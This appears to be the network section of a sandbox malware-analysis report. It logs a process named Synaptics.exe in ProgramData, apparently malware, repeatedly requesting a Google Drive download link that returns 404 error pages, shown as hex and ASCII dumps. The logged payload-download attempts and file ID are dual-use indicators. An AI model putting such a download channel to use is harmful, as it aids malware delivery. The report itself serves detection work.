                                                                                                                    6192.168.2.1149768142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:30 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:30 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-yF-7yZG5PXiAgJTX0rBEnQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    7192.168.2.1149769142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:30 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:30 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:30 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-2W32sZ41cTG61cvRIFJ8QA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    8192.168.2.1149771142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:30 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-07 12:18:31 UTC1594INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC5GgQF2kF1bSGzLdPsMNxWyfTc0pkL-XydrrNDxFxvD68OmlCsdo-Fc0vAdUY2LyXns
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:31 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-TDErWUJAIv-7IC3AOr6Uww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=KO29nQ3BoH9z9rIHYq_AE_sQZZkity_O8wgVZicUTn8OVV4nhbnGHMoMHoe2Ek83cgjFEKUQU70cKZWsU7BTOruMh9wf9FtiSIM974Z6xD_1WCWVXeY2OfzDItv1dKCgY7a2aOgWsxmGEFpBx9437BSTZ06oxcM3-tt0XXMypP_g7n7FWe32Z78; expires=Wed, 09-Jul-2025 12:18:31 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:31 UTC1594INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 6f 78 6e 35 4f 35 41 6c 33 76 52 69 7a 4f 37 57 6d 39 4d 61 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uoxn5O5Al3vRizO7Wm9MaQ">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                    2025-01-07 12:18:31 UTC58INData Raw: 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: nd on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    9192.168.2.1149772142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:30 UTC186OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    2025-01-07 12:18:31 UTC1595INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4HvbgaPcPZwvwbSH0JyG-2ToaNzLwNUPjMb_OFik7n-Kqzn5feggn2Ja3Nl0d5NQ9I
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:31 GMT
                                                                                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce--ScSs8qvgEakHWCB_SQdIg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Set-Cookie: NID=520=SZhc7KpC7T7X_R4yEGnNU40kjC7yz3C4_NBUvYTPUWKiYXDIuLwZpAjOF9ocrn4ar2j4bV1J2f0z3dlz4oDnOYNQzR2bwN6GOOAoebYHKlpySm8FUhpfYjo16rCBD_LjcVUQ4yLvGq3_XMw82uBZLD38OBwjWCHX9Fm9FxeZdjzftFSo6zxSzx80; expires=Wed, 09-Jul-2025 12:18:31 GMT; path=/; domain=.google.com; HttpOnly
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:31 UTC1595INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 48 46 58 67 4c 63 6b 4c 41 39 78 6a 45 69 31 50 6b 34 72 64 6e 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="HFXgLckLA9xjEi1Pk4rdnA">*{margin:0;padding:0}html,code{font:15px/22px arial
                                                                                                                    2025-01-07 12:18:31 UTC57INData Raw: 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: d on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    10192.168.2.1149780142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:31 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:31 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-ycui52JIVgIw7HC9xQ_paA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    11192.168.2.1149781142.250.185.1104432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:31 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2025-01-07 12:18:31 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:31 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-eZU07D1svZdoQsDN-cQPmA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    12192.168.2.1149782142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:31 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
                                                                                                                    2025-01-07 12:18:32 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7spNP93ghvaesPcubp1zMAP3_n3Co983-BhJ5agm3hiiFzyNyFa9FqrcrXbV3oN-9x
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:32 GMT
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-EGWS5ndX-zRBe0YR_jXpKQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:32 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:32 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 6a 64 74 57 33 58 35 64 67 6b 61 50 77 56 37 6b 42 75 48 32 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="UjdtW3X5dgkaPwV7kBuH2g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2025-01-07 12:18:32 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    13192.168.2.1149784142.250.186.1614432260C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2025-01-07 12:18:31 UTC388OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=GPEyRES6dnqa1PybEf1Rr9o_i-ytwRPdlTGDsBasGkkG7RhcjgUsndoApuB8EFNTU4HfwbwCVTZagBwpmXuTfOxEIZiwWE3n4rVZtzJ2p6IAeB8jqavW6Dh651yVrmDwcr9snCEqzJWtRpfMyr4oe6sqzmlW9VHeMOaKogqkwadCM0pdyCAi9g-8
                                                                                                                    2025-01-07 12:18:32 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC4uOV_xL7N__W0nzr3nEyPDSdUUsE2KJJHCLBfnFC6E1BpqeU0LGSykG8uV7ZOTM6L1
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Tue, 07 Jan 2025 12:18:32 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-pMHi68RNn49_7_43Az5uGg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2025-01-07 12:18:32 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2025-01-07 12:18:32 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 53 61 58 5a 33 6c 33 45 6a 43 73 48 76 48 45 79 4c 56 32 6a 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
